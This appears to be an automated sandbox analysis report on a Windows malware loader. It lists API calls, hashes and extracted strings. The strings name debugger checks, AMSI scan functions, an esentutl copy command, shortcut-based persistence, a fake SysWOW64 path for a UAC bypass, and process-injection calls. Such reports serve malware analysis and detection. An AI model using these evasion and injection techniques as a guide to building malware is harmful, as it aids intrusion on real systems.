                                                                      • Instruction Fuzzy Hash: 5DE0B6B278020ABF9B40EFD8D855D9B7BECAB082447004610FA1AD3211C730E8219B60
                                                                      APIs
                                                                      • RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Path$DeleteFileNameName_
                                                                      • String ID:
                                                                      • API String ID: 4284456518-0
                                                                      • Opcode ID: 456a3db5296e19264c740f689f009c9207b67a7aa33330165e20f29c7bb1e077
                                                                      • Instruction ID: ff58344bc7af927876dea10dcaa8385424d9cd80a851767059b394376d6947be
                                                                      • Opcode Fuzzy Hash: 456a3db5296e19264c740f689f009c9207b67a7aa33330165e20f29c7bb1e077
                                                                      • Instruction Fuzzy Hash: E701D63594460E6EEB05EBA0DD51FCD77BDBB4470CF5004E2D202F7481DAB4AB049B64
                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                      • String ID:
                                                                      • API String ID: 1530111750-0
                                                                      • Opcode ID: af7a62535fb99b8544d8620277c483f42acb604e6f2c9996a8c2abe9f9592412
                                                                      • Instruction ID: d4c843bdd1a472036338ef846e09040637caaaba90aefe9668ae6fb788ec3b5d
                                                                      • Opcode Fuzzy Hash: af7a62535fb99b8544d8620277c483f42acb604e6f2c9996a8c2abe9f9592412
                                                                      • Instruction Fuzzy Hash: 8801447594020DBEDB11EBA0DD56FCDB3BDEB48708F5044B1E201E2580EB746B049A64
                                                                      APIs
                                                                        • Part of subcall function 02CA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6DB9,?,?,?,00000000), ref: 02CA6D99
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,02CA6EAC,00000000,00000000,02CA6E2B,?,00000000,02CA6E9B), ref: 02CA6E17
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFromInstanceProg
                                                                      • String ID:
                                                                      • API String ID: 2151042543-0
                                                                      • Opcode ID: d9648c45be49d056e58e5dbe337f44fb2457ab730a634f94cd2b75c033573853
                                                                      • Instruction ID: be568edf0dcb4896a2a9513be8c4e027b92522a1e6f4e2fe4c7785ff4da887d1
                                                                      • Opcode Fuzzy Hash: d9648c45be49d056e58e5dbe337f44fb2457ab730a634f94cd2b75c033573853
                                                                      • Instruction Fuzzy Hash: 38012671608749AEFF15EFA1DC3286FBBBDE74AB04F610835F405E2680E6319900D860
                                                                      APIs
                                                                      • InetIsOffline.URL(00000000,00000000,02CBB784,?,?,?,00000000,00000000), ref: 02CAF801
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02CAFAEB,UacInitialize,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize), ref: 02CAF6EE
                                                                        • Part of subcall function 02CAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAF700
                                                                        • Part of subcall function 02CAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAF754
                                                                        • Part of subcall function 02CAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAF766
                                                                        • Part of subcall function 02CAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAF77D
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02C9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E0B8B8,?,02CB0751,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession), ref: 02C9C37B
                                                                        • Part of subcall function 02CADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDAB
                                                                        • Part of subcall function 02CADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDDB
                                                                        • Part of subcall function 02CADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADDF0
                                                                        • Part of subcall function 02CADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADE1C
                                                                        • Part of subcall function 02CADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADE25
                                                                        • Part of subcall function 02C97E80: GetFileAttributesA.KERNEL32(00000000,?,02CB356F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,Initialize), ref: 02C97E8B
                                                                        • Part of subcall function 02C98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02CB370D,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8), ref: 02C98055
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                      • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                      • API String ID: 297057983-2894825931
                                                                      • Opcode ID: e9f4dbb8c3b039d86cdbbe10f438983c8f611bb60c4c75f33c51a63545fa7f67
                                                                      • Instruction ID: 41d9abfa6b14bcae32204df12f2d3e8f5590fb1d3d037664345dbbb86328a7ca
                                                                      • Opcode Fuzzy Hash: e9f4dbb8c3b039d86cdbbe10f438983c8f611bb60c4c75f33c51a63545fa7f67
                                                                      • Instruction Fuzzy Hash: 2A142775A0411D9FDF35EBA4DC94ACE73BABF89304F1041E1E409AB614DA30AE92EF51

                                                                      Control-flow Graph

                                                                      • Graph of the function at 2cb8128 (basic blocks 2cb8128-2cbb2fa); API calls on its paths: CreateProcessAsUserW, ResumeThread, CloseHandle, ExitProcess. Executed / Not Executed block rendering not reproduced.
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                      • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E0B7E0,02E0B824,OpenSession,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB86E9
                                                                      • ResumeThread.KERNEL32(00000BEC,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8), ref: 02CB8D33
                                                                        • Part of subcall function 02CA8730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02CA8761
                                                                      • CloseHandle.KERNEL32(00000BF8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,00000BEC,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380), ref: 02CB8EB2
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • CloseHandle.KERNEL32(00000BF8,00000BF8,ScanBuffer,02D17380,02CBB7B8,UacInitialize,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB92A4
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02CADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                        • Part of subcall function 02CADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                        • Part of subcall function 02CADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                        • Part of subcall function 02CADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                        • Part of subcall function 02CA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
                                                                      • ExitProcess.KERNEL32(00000000,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,Initialize,02D17380,02CBB7B8,00000000,00000000,00000000,ScanString,02D17380,02CBB7B8), ref: 02CBB2FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileLibrary$CreateFreeHandlePathProcessThread$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcQueueResumeUserWrite
                                                                      • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                      • API String ID: 2961332323-3516509641
                                                                      • Opcode ID: 75d219f9b8476c2748745ccda0f75a7d5759776135ac5e076da642a0b2eb2b37
                                                                      • Instruction ID: 769271d1d89d1d258e3af2a80870eba269b2844d59e3e1b0f4588631943f3bb2
                                                                      • Opcode Fuzzy Hash: 75d219f9b8476c2748745ccda0f75a7d5759776135ac5e076da642a0b2eb2b37
                                                                      • Instruction Fuzzy Hash: 3D43F7B9A0411D9FCF25EBA4DC949CE73BAFF89304F5041E1E409AB614DA30AE92DF51
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                        • Part of subcall function 02CADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                        • Part of subcall function 02CADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                        • Part of subcall function 02CADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,02CBBB30,00000000,00000000,02CBBB24,00000000,00000000), ref: 02CB40CB
                                                                        • Part of subcall function 02CA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02CA88C1
                                                                        • Part of subcall function 02CA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA8920
                                                                      • Sleep.KERNEL32(000003E8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,000003E8,ScanBuffer,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB4277
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • Sleep.KERNEL32(00004E20,UacScan,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacInitialize,02D17380,02CBB7B8), ref: 02CB50EE
                                                                        • Part of subcall function 02CADC04: RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                        • Part of subcall function 02CADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                        • Part of subcall function 02CADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02CA85BC: WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                      • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                      • API String ID: 2171786310-3926298568
                                                                      • Opcode ID: 1986bc2150e17b2c00dac465f01ec12beddcd8cc34bcff6d10bcf4c44efb5dba
                                                                      • Instruction ID: 85b2ab5b3c4cfadf72382370c1faa3d39ec3794be0a9de85fdc95983f9c9094d
                                                                      • Opcode Fuzzy Hash: 1986bc2150e17b2c00dac465f01ec12beddcd8cc34bcff6d10bcf4c44efb5dba
                                                                      • Instruction Fuzzy Hash: D6433F75A0015D9FDF35EB64DC94ECE73BABF85308F1041E29409AB614CA70AE92EF51

                                                                      Control-flow Graph

                                                                      • Graph of the function at 2cae678 (basic blocks 2cae678-2caef2f); API calls on its paths: WaitForSingleObject, CloseHandle. Executed / Not Executed block rendering not reproduced.
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C,OpenSession,02D17380), ref: 02CAED6E
                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C,OpenSession), ref: 02CAED76
                                                                      • CloseHandle.KERNEL32(00000BDC,00000000,00000000,000000FF,ScanString,02D17380,02CAEF4C,OpenSession,02D17380,02CAEF4C,UacScan,02D17380,02CAEF4C,ScanBuffer,02D17380,02CAEF4C), ref: 02CAED7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                      • String ID: )"C:\Users\Public\Libraries\ovggtquW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                      • API String ID: 3475578485-4049182157
                                                                      • Opcode ID: 4d14965d7d257e7a63e8a6ca214f872a278c4ce483c76f0e62128f9d79692ee6
                                                                      • Instruction ID: 6a23caa7a5dac11473755619fc8b08fc3d9e0f3274b85a275e8c00b19d7f2607
                                                                      • Opcode Fuzzy Hash: 4d14965d7d257e7a63e8a6ca214f872a278c4ce483c76f0e62128f9d79692ee6
